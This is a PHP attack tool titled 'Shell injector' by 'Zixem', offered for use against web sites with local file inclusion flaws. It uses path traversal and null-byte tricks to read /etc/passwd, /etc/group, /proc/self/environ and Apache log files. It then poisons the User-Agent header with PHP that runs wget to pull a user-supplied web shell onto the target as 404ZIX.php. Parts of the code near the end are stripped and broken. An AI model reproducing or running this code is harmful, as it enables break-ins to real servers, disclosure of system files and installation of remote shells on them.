APC-By Zixem.

_____
Shell injector.


Ex. for vuln good links:

http://www.site.com/index.php?page= 

Ex. for vuln bad links:

http://www.site.com/index.php?page=about.php

Vuln link: .
Shell link:

___________LOG____________

<?php
// Varabiles PART

/*
Group file regex: 

root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:

*/

$url=$_GET['url'];
$x404=file_get_contents($url."ZiXeM.php");

//$passwd= array("../../../../../../../../../../../../../etc/passwd","/etc/passwd","../etc/passwd","/etc/group","../../../../../../../../../../../etc/group","../../../../../../../../proc/self/environ","/proc/self/environ","../proc/self/environ");
$passwd= array('../../../../../../../../../../../../../etc/passwd','/etc/passwd','../etc/passwd','/etc/group','../../../../../../../../../../../etc/group','../../../../../../../../proc/self/environ','/proc/self/environ','../proc/self/environ');

$logfiles= array("../apache/logs/error.log","../apache/logs/access.log","../../apache/logs/error.log","../../apache/logs/access.log","../../../apache/logs/error.log","../../../apache/logs/access.log","../../../../../../../etc/httpd/logs/acces_log","../../../../../../../etc/httpd/logs/acces.log","../../../../../../../etc/httpd/logs/error_log","../../../../../../../etc/httpd/logs/error.log","../../../../../../../var/www/logs/access_log","../../../../../../../var/www/logs/access.log","../../../../../../../usr/local/apache/logs/access_log","../../../../../../../usr/local/apache/logs/access.log","../../../../../../../var/log/apache/access_log","../../../../../../../var/log/apache2/access_log","../../../../../../../var/log/apache/access.log","../../../../../../../var/log/apache2/access.log","../../../../../../../var/log/access_log","../../../../../../../var/log/access.log","../../../../../../../var/www/logs/error_log","../../../../../../../var/www/logs/error.log","../../../../../../../usr/local/apache/logs/error_log","../../../../../../../usr/local/apache/logs/error.log","../../../../../../../var/log/apache/error_log","../../../../../../../var/log/apache2/error_log","../../../../../../../var/log/apache/error.log","../../../../../../../var/log/apache2/error.log","../../../../../../../var/log/error_log","../../../../../../../var/log/error.log","../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf","/etc/httpd/conf/httpd.conf","/logs/access.log","/logs/error.log");
$founded= array('ZiXeM');

if(isset($_GET['Go']) && $_GET['Go']=='Start.') {
if(!preg_match("/^http:\/\//",$_GET['url'])) {
die("Enter url must be with http:// !\n");
}

if(!preg_match("/^http:\/\//",$_GET['shell'])) {
die("Enter shell url with http:// !\n");
}

echo "Starting...\nTarget: {$_GET['url']}\n====================\n\n";
foreach($passwd as $checker) {
$x=file_get_contents($url.$checker."%00");
$x1=file_get_contents($url.$checker."%0A");
$x2=file_get_contents($url.$checker);
if(preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x) || preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x1) || preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x2)) {
$groupfile=TRUE;
}
if(preg_match("/DOCUMENT_ROOT=\//",$x) || preg_match("/DOCUMENT_ROOT=\//",$x1) || preg_match("/DOCUMENT_ROOT=\//",$x2)) {
$environfile=TRUE;
}
if(preg_match("/bin:x:1:root,bin,daemon/",$x) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x) || preg_match("/bin:x:1:root,bin,daemon/",$x1) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x1) || preg_match("/bin:x:1:root,bin,daemon/",$x2) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x2)) {
$passwdfile=TRUE;
}
}
if($groupfile==TRUE) { echo "[/etc/group] -> \tAvailable.\n"; } else { echo "[/etc/group] -> \tUnavailable.\n"; }
if($passwdfile==TRUE) { echo "[/etc/passwd] -> \tAvailable.\n";} else { echo "[/etc/passwd] -> \tUnavailable.\n"; }
if($environfile==TRUE) { echo "[/proc/self/environ] -> Available.\n";} else { echo "[/proc/self/environ] -> Unavailable.\n"; }

/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PART OF SCANNING THE LOG FILES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
// Word for Regex:   HTTP/1.1

foreach($logfiles as $logfile) {
$y=file_get_contents($url.$logfile);
if(preg_match("/HTTP\/1.1/i",$y)) {
echo "[Log file]: ->\t".$url.$logfile."%00\n";
$founded[]=$url.$logfile."%00";
}
else { $log_found=FALSE; }
}
if($log_found==FALSE && $environfile==TRUE) {

 echo "[Log file]: ->\tNot found.\n\nTrying /proc/self/environ method....\n";

$inject_num_2 = curl_init();
curl_setopt($inject_num_2, CURLOPT_URL, $url."../../../../../../../../../proc/self/environ");
curl_setopt($inject_num_2, CURLOPT_HEADER, 1);
curl_setopt($inject_num_2, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>");
echo "

"; echo "

"; $final_exec=curl_exec($inject_num_2); echo "

"; curl_close($inject_num_2); $inject_num_3 = curl_init(); curl_setopt($inject_num_3, CURLOPT_URL, $url."../../../../../../../../../proc/self/environ%00"); curl_setopt($inject_num_3, CURLOPT_HEADER, 1); curl_setopt($inject_num_3, CURLOPT_USERAGENT, ""); echo "

"; $final_exec3=curl_exec($inject_num_3); echo "

"; $inject_num_4 = curl_init(); curl_setopt($inject_num_4, CURLOPT_URL, $url."/proc/self/environ%00"); curl_setopt($inject_num_4, CURLOPT_HEADER, 1); curl_setopt($inject_num_4, CURLOPT_RETURNTRANSFER, 1); curl_setopt($inject_num_4, CURLOPT_USERAGENT, ""); echo "

"; $final_exec4=curl_exec($inject_num_4); echo "

"; echo "
"; //echo "
"; file_get_contents($url.""); file_get_contents($founded[1]); echo ""; echo ""; } } ?>